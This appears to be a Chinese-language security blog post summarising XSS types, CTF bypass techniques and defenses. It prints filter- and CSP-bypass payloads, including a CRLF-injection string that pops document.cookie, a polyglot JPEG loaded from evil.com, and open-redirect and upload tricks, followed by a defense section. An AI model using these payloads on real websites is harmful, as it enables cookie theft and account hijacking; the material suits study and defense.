<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="v_OkIhl-1XjKYm3MZSJoivLgfqE3N9Snb2bj2c9YDrw" />













  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="XSS,web security" />








  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico?v=5.1.2" />






<meta name="description" content="XSS 知识利用XSS技术，攻击者可以在浏览器正在执行的原始服务器代码的上下文中插入远程代码。从浏览器角度来看，插入的代码看起来与合法应用一样，都源自同一个服务器，因此就会允许这些代码访问本地资源，最终将隐私数据泄露给攻击者，甚至会出现应用会话劫持现象。 xss 分类xss大致分为：反射型、存储型、DOM型（这三种为主流）. 无论反射型还是存储型，都是需要与服务端交互的，即服务端将提交的内容反馈到">
<meta name="keywords" content="XSS,web security">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS利用与防御">
<meta property="og:url" content="https://blog.nyrae.icu/blog/xss-bypass-tricks/index.html">
<meta property="og:site_name" content="empty_xl Blog">
<meta property="og:description" content="XSS 知识利用XSS技术，攻击者可以在浏览器正在执行的原始服务器代码的上下文中插入远程代码。从浏览器角度来看，插入的代码看起来与合法应用一样，都源自同一个服务器，因此就会允许这些代码访问本地资源，最终将隐私数据泄露给攻击者，甚至会出现应用会话劫持现象。 xss 分类xss大致分为：反射型、存储型、DOM型（这三种为主流）. 无论反射型还是存储型，都是需要与服务端交互的，即服务端将提交的内容反馈到">
<meta property="og:locale" content="en">
<meta property="og:updated_time" content="2021-08-24T13:44:19.755Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS利用与防御">
<meta name="twitter:description" content="XSS 知识利用XSS技术，攻击者可以在浏览器正在执行的原始服务器代码的上下文中插入远程代码。从浏览器角度来看，插入的代码看起来与合法应用一样，都源自同一个服务器，因此就会允许这些代码访问本地资源，最终将隐私数据泄露给攻击者，甚至会出现应用会话劫持现象。 xss 分类xss大致分为：反射型、存储型、DOM型（这三种为主流）. 无论反射型还是存储型，都是需要与服务端交互的，即服务端将提交的内容反馈到">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: 'QT63IJTEZX',
      apiKey: '39726b4e0e80a502f3d0a45f494af02f',
      indexName: 'blog.nyrae.icu',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://blog.nyrae.icu/blog/xss-bypass-tricks/"/>





  <title>XSS利用与防御 | empty_xl Blog</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-90390918-1', 'auto');
  ga('send', 'pageview');
</script>


  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?edc3c09a0382806fc3a47d6c11483da0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">empty_xl Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Hacked By_ emm myself?</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://blog.nyrae.icu/blog/xss-bypass-tricks/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="empty_xl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="empty_xl Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS利用与防御</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-10-02T11:56:17+08:00">
                2017-10-02
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2021-08-24T21:44:19+08:00">
                2021-08-24
              </time>
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/XSS/" itemprop="url" rel="index">
                    <span itemprop="name">XSS</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="XSS-知识"><a href="#XSS-知识" class="headerlink" title="XSS 知识"></a>XSS 知识</h3><p>利用XSS技术，攻击者可以在浏览器正在执行的原始服务器代码的上下文中插入远程代码。从浏览器角度来看，插入的代码看起来与合法应用一样，都源自同一个服务器，因此就会允许这些代码访问本地资源，最终将隐私数据泄露给攻击者，甚至会出现应用会话劫持现象。</p>
<h4 id="xss-分类"><a href="#xss-分类" class="headerlink" title="xss 分类"></a>xss 分类</h4><p>xss大致分为：反射型、存储型、DOM型（这三种为主流）.</p>
<p>无论反射型还是存储型，都是需要与服务端交互的，即<strong>服务端将提交的内容反馈到了html源码内，导致触发xss</strong>，也就是说返回到html源码中可以看到触发xss的代码；而<strong>DOM型xss是不与服务端交互的，只与客户端上的js交互</strong>，也就是说提交的恶意代码，被放到了js中执行，然后显示出来。那么这种形式有一个问题，就是html源码里面不存在触发xss的代码，因为服务端返回的源码都是一样的，<strong>只不过源码里面包含了一段js，这段js再执行后生成了一段xss代码</strong>，可以在审查元素中查看到。</p>
<h5 id="反射型xss"><a href="#反射型xss" class="headerlink" title="反射型xss"></a>反射型xss</h5><p>只是简单地把用户输入的数据”反射”给浏览器，攻击时需要用户配合点击，也叫<code>非持久型xss</code></p>
<h5 id="存储型xss"><a href="#存储型xss" class="headerlink" title="存储型xss"></a>存储型xss</h5><p>会把用户输入的数据”存储”在服务器端，也叫<code>持久性xss</code>，常见留言板等可以提交展示用户输入内容的功能点。</p>
<h5 id="DOM型xss"><a href="#DOM型xss" class="headerlink" title="DOM型xss"></a>DOM型xss</h5><p>可通过修改页面的DOM节点形成的xss漏洞</p>
<a id="more"></a>
<h4 id="xss-危害"><a href="#xss-危害" class="headerlink" title="xss 危害"></a>xss 危害</h4><p>xss漏洞是发生在客户端，目的是让浏览器执行一段用户提交的恶意js代码，从而达到某种目的。  </p>
<p>以下列举了xss漏洞能够造成的一些危害（xss漏洞危害包含但不仅限于以下几种）：</p>
<ul>
<li>cookie劫持（窃取cookie）</li>
<li>后台增删改文章等操作（类似于csrf骗取用户点击，利用js模拟浏览器发包，借助xmlhttprequest类）</li>
<li>钓鱼，利用xss构造出一个登录框，骗取用户账户密码。</li>
<li>Xss蠕虫（利用xss漏洞进行传播）</li>
<li>修改网页代码</li>
<li>利用网站重定向</li>
<li>获取用户信息（如浏览器信息，IP地址等）</li>
</ul>
<h3 id="xss-利用"><a href="#xss-利用" class="headerlink" title="xss 利用"></a>xss 利用</h3><p>XSS的绕过思路一般比较多，知识点比较细，这里我对我所遇到过的题目知识点及技巧做一个总结，不过建议还是先去看某个技巧相关的题目，那样理解更加深刻一些。本文并未对每个点做题目解析，而仅仅总结知识点，其余内容可以看各个CTF的XSS writeup。</p>
<p>XSS一般通常是对用户输入未做适当的处理，然后在渲染时，当把用户的输入放入网页中时，发生问题，这里最重要的是<strong><em>判断用户输入最终的输出位置及所处的上下文环境</em></strong></p>
<h4 id="了解输出所处环境"><a href="#了解输出所处环境" class="headerlink" title="了解输出所处环境"></a>了解输出所处环境</h4><p>这一点，我觉得是最重要的，知道了输出环境，才能去有效的构造payload而不是盲目的尝试。</p>
<table>
<thead>
<tr>
<th style="text-align:center">位置</th>
<th style="text-align:left">编码方式</th>
<th style="text-align:center">事例</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">url中</td>
<td style="text-align:left">url编码</td>
<td style="text-align:center"><code>%3c</code>、<code>%2f</code></td>
</tr>
<tr>
<td style="text-align:center">HTML标签或属性</td>
<td style="text-align:left">HTML实体编码</td>
<td style="text-align:center"><code>&amp;#60;</code>、<code>&amp;lt;</code></td>
</tr>
<tr>
<td style="text-align:center">HTML事件、script标签</td>
<td style="text-align:left">javascript编码</td>
<td style="text-align:center"><code>\u003c</code></td>
</tr>
<tr>
<td style="text-align:center">css中</td>
<td style="text-align:left">16进制编码</td>
<td style="text-align:center"><code>\uHH</code></td>
</tr>
</tbody>
</table>
<p>这里的编码方式指的是，当浏览器或者其他解析器去解析这个格式时，可以看成执行了一次对应的decode。</p>
<h4 id="闭合"><a href="#闭合" class="headerlink" title="闭合"></a>闭合</h4><p>当所处环境无法执行我们恶意代码时，通常会采用闭合的方式进行逃逸，闭合也是最为常见的绕过方式，因为一般闭合之后会给我们更大的自由度。  </p>
<ul>
<li>常见的闭合方式包括引号闭合、标签闭合、括号闭合等内容。闭合标签会优先识别</li>
<li>注释可以用<code>--&gt;</code>和<code>--!&gt;</code>闭合</li>
<li>JS代码块可以用<code>--&gt;</code>作为注释</li>
<li>换行有时候会使得字符所处环境可以很容易的改变，有时换行符不只有<code>\n[\u000A]</code>，<code>\r[\u000D]</code>,<code>\u2028[line separator]</code>,<code>\u2029[paragraph separator]</code>也被认为是有效的换行分隔符</li>
<li>有时没了让攻击立即渲染，有时需要加个空格或者换行</li>
</ul>
<h4 id="正则表达式绕过"><a href="#正则表达式绕过" class="headerlink" title="正则表达式绕过"></a>正则表达式绕过</h4><p>有时错误的正则表达式会给我们绕过造成机会。</p>
<ul>
<li>多次替换，后者替换之后会将本来异常的内容构造成正常语句</li>
<li><code>^$</code>行首行尾的泄露</li>
<li>未进行多行匹配导致换行绕过</li>
<li>正则表达式特殊字符的利用<code>$$、$&#39;</code>等</li>
</ul>
<h4 id="构造"><a href="#构造" class="headerlink" title="构造"></a>构造</h4><ul>
<li>遇见<code>toUpperCase</code>等函数时，HTML标签大写后依旧可以使用，而js函数则不行，有一些语言由于没有对应的大写字母，<code>toUpperCase</code>会使得其转换为英文某个字母</li>
<li>程序中使用的某些变量或者JSON字段，可以通过用户输入构造同名的变量，从而覆盖默认值，造成绕过检测。</li>
<li>使用<code>/* */</code>通常可以在多行内容时形成DOM-XSS</li>
<li>关键词被过滤，可以使用<code>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</code></li>
<li>字符串可以通过<code>parseInt(str,radix)</code>转为数字，使用<code>(number).toString(radix)</code>在payload中转回来</li>
</ul>
<h4 id="一些技巧"><a href="#一些技巧" class="headerlink" title="一些技巧"></a>一些技巧</h4><ul>
<li>JSFUCK 使用<code>[]()+!</code>这六个字符完成任意内容，不过payload会很长</li>
<li><code>input</code>标签内可以通过<code>type</code>来修改类型，例如<code>type=img/type=hidden</code></li>
<li>在js环境中，<code>&#39;String&#39;(alert(1))</code> 字符串跟着括号内的语句，会执行</li>
</ul>
<h5 id="javascript-伪协议"><a href="#javascript-伪协议" class="headerlink" title="javascript 伪协议"></a>javascript 伪协议</h5><p><a href="http://brutelogic.com.br/blog/alternative-javascript-pseudo-protocol/" target="_blank" rel="external">文章源自这里</a></p>
<p>思路是利用数据URI机制，类似<code>data:</code>这种，在URL请求中构造javascript伪协议，比如chrome中直接输入以下内容即可触发:</p>
<figure class="highlight aspectj"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">javascript:alert(1)</div></pre></td></tr></table></figure>
<p>当然，如果有WAF还可以利用其替换、解码规则</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">http(s)<span class="symbol">://host/page?p=&lt;iframe</span> src=<span class="string">?p</span>=%<span class="number">253</span>Csvg/o%<span class="number">256</span>Eload%<span class="number">253</span>Dalert(<span class="number">1</span>)%<span class="number">253</span>E&gt;</div></pre></td></tr></table></figure>
<h5 id="构造恶意图片"><a href="#构造恶意图片" class="headerlink" title="构造恶意图片"></a>构造恶意图片</h5><p>思路是构造恶意jpeg文件，然后以js去加载此图片，<a href="http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html" target="_blank" rel="external">文章在这里</a></p>
<p>其核心有几点，首先是构造<code>2F 2A</code>字段，用于形成注释<code>/*</code>左部，具体<code>jpeg</code>每个字段的含义在我博客<a href="https://hellohxk.com/blog/image/#1-JPEG" target="_blank" rel="external">这篇文章</a>有总结：</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">FF D8 FF E0 <span class="number">2</span>F <span class="number">2</span>A <span class="number">4</span>A <span class="number">46</span> <span class="number">49</span> <span class="number">46</span> <span class="number">00</span> <span class="number">01</span> <span class="number">01</span> <span class="number">01</span> <span class="number">00</span> <span class="number">48</span> <span class="number">00</span> <span class="number">48</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00.</span>...</div></pre></td></tr></table></figure>
<p>然后在<code>comment</code>字段中，闭合<code>*/=alert(&quot;Burp rocks.&quot;)/*</code></p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">FF FE <span class="number">00</span> <span class="number">1</span>C <span class="number">2</span>A <span class="number">2</span>F <span class="number">3</span>D <span class="number">61</span> <span class="number">6</span>C <span class="number">65</span> <span class="number">72</span> <span class="number">74</span> <span class="number">28</span> <span class="number">22</span> <span class="number">42</span> <span class="number">75</span> <span class="number">72</span> <span class="number">70</span> <span class="number">20</span> <span class="number">72</span> <span class="number">6</span>F <span class="number">63</span> <span class="number">6</span>B <span class="number">73</span> <span class="number">2</span>E <span class="number">22</span> <span class="number">29</span> <span class="number">3</span>B <span class="number">2</span>F <span class="number">2</span>A</div></pre></td></tr></table></figure>
<p>最后再闭合前一个注释</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">2A 2F 2F 2F FF D9</div><div class="line"></div><div class="line"><span class="section">= *///FF D9 成功注释前面和后面</span></div></pre></td></tr></table></figure>
<p>如果可以<code>&lt;script src=&quot;evil.com/evil.jpeg&quot;&gt;&lt;/script&gt;</code>便会成功触发xss</p>
<h5 id="利用CRLF"><a href="#利用CRLF" class="headerlink" title="利用CRLF"></a>利用CRLF</h5><p>其实有点属于HTTP头部注入的内容了，原文在<a href="https://zhchbin.github.io/2016/01/31/CRLF-Injection-and-Bypass-WAF/" target="_blank" rel="external">这里</a></p>
<p>其背景如下：</p>
<p>某一个接口<code>URL</code>：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="symbol">https:</span><span class="comment">//xxx.com/cgi-bin/xxx/geiwofahongbaowojiugaosuni?exportkey=&amp;pass_ticket=a</span></div></pre></td></tr></table></figure>
<p>发现返回内容如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">HTTP/1.1 <span class="number">200</span> OK</div><div class="line"><span class="attribute">Server</span>: nginx/1.6.0</div><div class="line"><span class="attribute">Date</span>: Sat, 30 Jan 2016 12:08:28 GMT</div><div class="line"><span class="attribute">Content-Type</span>: text/html; charset=gbk</div><div class="line"><span class="attribute">Content-Length</span>: 0</div><div class="line"><span class="attribute">Connection</span>: keep-alive</div><div class="line"><span class="attribute">Cache-Control</span>: no-cache, must-revalidate</div><div class="line"><span class="attribute">Set-Cookie</span>: pass_ticket=a; Domain=xxx.com; Path=/; Expires=Sun, 31-Jan-2016 12:08:28 GMT</div></pre></td></tr></table></figure>
<p>可以看到返回中有<code>pass_ticket</code>且内容不变，尝试<code>CRLF</code>注入，虽然注入成功，但存在WAF过滤了某些内容，其绕过思路是这样的：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="bullet">1. </span>插入Content-Type更改response中的charset</div><div class="line"><span class="bullet">2. </span>选择一个字符集，保证该字符集中的某个字符或字符串会被浏览器忽略（也可以是unicode transform）</div><div class="line"><span class="bullet">3. </span>将会被忽略的字符插入到被blacklist拦截的字符之间</div></pre></td></tr></table></figure>
<p>最终构造的payload为:</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">?exportkey=&amp;pass_ticket=a%0D%0AContent-Length:<span class="number">120</span>%0D%0AX-XSS-Protection:<span class="number">0</span>%0D%0AContent-Type:<span class="keyword">text</span>/html;%20charset=ISO<span class="number">-2022</span>-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=%22al%1B%28Jert%28document.co%1B%28Jokie%29%22%3E</div></pre></td></tr></table></figure>
<h5 id="HTML-闭合优先级"><a href="#HTML-闭合优先级" class="headerlink" title="HTML 闭合优先级"></a>HTML 闭合优先级</h5><p>看以下代码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">&lt;noframes&gt;</div><div class="line">&lt;img src=&quot;//a.com/p.jpg&lt;/noframes&gt;&lt;script&gt;alert(1)&lt;/script&gt;&quot;&gt;&gt;</div></pre></td></tr></table></figure>
<p>按理来说，由于都被双引号包裹，应该出现一个错误图片，但运行一下才发现，会执行弹窗，原因是浏览器将字符串中<code>&quot;xx&lt;/noframes&gt;xx&quot;</code>解释为了标签，把前面的<code>&lt;noframe&gt;</code>闭合了，导致后面的脚本成功运行。可以发现，浏览器在做DOM解析的时候，有些标签的优先级是高于<code>&quot;</code>的，有人<code>fuzz</code>了一下：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="section">&lt;!--</span></div><div class="line">&lt;iframe&gt;</div><div class="line"><span class="section">&lt;noframes&gt;</span></div><div class="line"><span class="section">&lt;noscript&gt;</span></div><div class="line"><span class="section">&lt;script&gt;</span></div><div class="line"><span class="section">&lt;style&gt;</span></div><div class="line"><span class="section">&lt;textarea&gt;</span></div><div class="line"><span class="section">&lt;title&gt;</span></div><div class="line"><span class="section">&lt;xmp&gt;</span></div></pre></td></tr></table></figure>
<p>这些标签都比<code>&quot;</code>闭合的优先级高。有时候，这些特性，会很有用。</p>
<h4 id="CSP-bypass"><a href="#CSP-bypass" class="headerlink" title="CSP bypass"></a>CSP bypass</h4><h5 id="xss结合上传漏洞"><a href="#xss结合上传漏洞" class="headerlink" title="xss结合上传漏洞"></a>xss结合上传漏洞</h5><p>最普通最常见的CSP规则，只允许加载当前域的js。</p>
<p>站内总会有上传图片的地方，如果我们上传一个内容为js的图片，图片就在网站的当前域下了。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">alert(<span class="number">1</span>)<span class="comment">//</span></div></pre></td></tr></table></figure>
<p>直接加载图片就可以了</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">'upload/test.js'</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></div></pre></td></tr></table></figure>
<h5 id="重定向"><a href="#重定向" class="headerlink" title="重定向"></a>重定向</h5><p>当你发现设置self并不安全的时候，可能会选择把静态文件的可信域限制到目录，看上去好像没什么问题了。</p>
<p>但是如果可信域内存在一个可控的重定向文件，那么CSP的目录限制就可以被绕过。</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">假设static目录下存在一个302文件</div><div class="line"><span class="php"><span class="meta">&lt;?php</span> Header(<span class="string">"location: "</span>.$_GET[<span class="string">'url'</span>])<span class="meta">?&gt;</span></span></div></pre></td></tr></table></figure>
<p>上传一个test.jpg,然后通过302.php跳转到upload目录加载js就可以成功执行</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"static/302.php?url=upload/test.jpg"</span>&gt;</span><span class="undefined"></span></div></pre></td></tr></table></figure>
<h5 id="利用浏览器漏洞"><a href="#利用浏览器漏洞" class="headerlink" title="利用浏览器漏洞"></a>利用浏览器漏洞</h5><p>来源于<a href="https://www.anquanke.com/post/id/86838" target="_blank" rel="external">这篇文章</a>  </p>
<p><strong>Talos-2017-0306（CVE-2017-2419, CVE-2017-5033）</strong></p>
<blockquote>
<p>我们发现Microsoft Edge浏览器（40.15063版仍未修复）、Google Chrome浏览器（已修复）以及Safari浏览器（已修复）中存在一个信息泄露漏洞。利用这个漏洞，攻击者可能绕过<code>Content-Security-Policy</code>头指定的策略，导致信息泄露问题。</p>
</blockquote>
<p>漏洞利用由三个主要模块构成：（a）在<code>Content-Security-Policy</code>中使用<code>unsafe-inline</code>指令，使浏览器支持内联<code>inline</code>脚本代码；（b）使用<code>window.open()</code>打开一个空白的新窗口；（3）调用<code>document.write</code>函数将代码写入新创建的空白窗口对象中，以绕过文档上的CSP限制策略。</p>
<p>这个问题会影响Microsoft Edge浏览器、老版本的Google Chrome浏览器以及Firefox浏览器，原因在于<code>about:blank</code>页面与加载该页面的文档属于同一个源，但不受CSP策略限制，基于这些事实，攻击者就可以完成漏洞利用。</p>
<blockquote>
<p>攻击者可以使用<code>window.open(&quot;&quot;,&quot;_blank&quot;)</code>创建一个新页面，然后使用<code>document.write</code>将恶意脚本写入该页面，由于攻击者处于<code>about:blank</code>页面中，因此可以绕过原始页面上的CSP限制策略，成功访问其他站点。有人可能会说，这是因为CSP头中使用了不安全内联方式来加载代码才导致这个问题，但即便如此，浏览器也应该阻止任何形式的跨站通信行为（比如使用1×1像素大小的跟踪图片等行为）。</p>
</blockquote>
<p><code>about:blank</code>页面与其加载文档属于同一个源，但却不受CSP限制策略影响。在CSP规范文档中，早已明确指出CSP限制策略应该被页面所继承。<br><strong>注意一下，about:blank标签和本地文件路径的CSP规则</strong></p>
<h3 id="xss防御"><a href="#xss防御" class="headerlink" title="xss防御"></a>xss防御</h3><ul>
<li>可在cookie中设置httponly（浏览器禁止页面的js访问带有httponly属性的cookie）</li>
<li>xss filter（检查输入，设置白名单方式）</li>
<li>输出检查（编码，转义，常用编码：html编码，js编码，16进制等)</li>
<li>针对不同位置的输出，使用不同的处理方式</li>
<li>处理富文本</li>
<li>header中使用content-Sencurity-Policy字段，规定请求js的域名白名单（CSP策略）</li>
</ul>
<h4 id="httponly"><a href="#httponly" class="headerlink" title="httponly"></a>httponly</h4><p>规定了不能使用<code>js</code>去获取<code>cookie</code>的内容，因此它只能防御利用xss进行<code>cookie劫持</code>的问题。但由于现代网页功能越来越丰富，js通常都需要访问<code>cookie</code>中的内容，所以在很多网站选择了不使用<code>httponly</code>字段。</p>
<h4 id="xss-filter"><a href="#xss-filter" class="headerlink" title="xss filter"></a>xss filter</h4><p><code>xss filter</code>往往是一个文本文件，里面包含了允许被用户输入提交的字符（也有些是包含不允许用户提交的字符）。它检测的点在于用户输入的时候，xss filter分为白名单与黑名单，推荐使用白名单，但即使使用白名单还是无法完全杜绝xss问题，并且使用不当可能会带来很高的误报率。</p>
<h4 id="编码转义"><a href="#编码转义" class="headerlink" title="编码转义"></a>编码转义</h4><p>编码方式有很多，比如<code>html编码</code>、<code>url编码</code>、<code>16进制编码</code>、<code>javascript编码</code>等。<br>在处理用户输入时，除了用<code>xss filter</code>的方式过滤一些敏感字符外，还需要配合编码，将一些敏感字符通过编码的方式改变原来的样子，从而不能被浏览器当成js代码执行。</p>
<h4 id="处理富文本"><a href="#处理富文本" class="headerlink" title="处理富文本"></a>处理富文本</h4><p>有些网页编辑器允许用户提交一些自定义的html代码，称之为<code>富文本</code>。想要在富文本处防御xss漏洞，最简单有效的方式就是控制用户能使用的标签，限制为只能使用<code>a</code>、<code>div</code>等安全的标签。</p>
<h4 id="CSP-Content-Security-Policy-内容安全策略"><a href="#CSP-Content-Security-Policy-内容安全策略" class="headerlink" title="CSP Content Security Policy 内容安全策略"></a>CSP Content Security Policy 内容安全策略</h4><p>CSP 的实质就是白名单制度，开发者明确告诉客户端，哪些外部资源可以加载和执行，等同于提供白名单。CSP只允许被认可的JS块、JS文件、CSS等解析，只允许向指定的域发起请求。它的实现和执行全部由浏览器完成，开发者只需提供配置。CSP大大增强了网页的安全性。攻击者即使发现了漏洞，也没法注入脚本，除非还控制了一台列入了白名单的可信主机。</p>
<p>CSP的特点就是他是在浏览器层面做的防护，是和同源策略同一级别，除非浏览器本身出现漏洞，否则不可能从机制上绕过。</p>
<p>两种方法可以启用 CSP。一种是通过 HTTP 头信息的<code>Content-Security-Policy</code>的字段。另一种是通过网页的<code>&lt;meta&gt;</code>标签。</p>
<p>例如：</p>
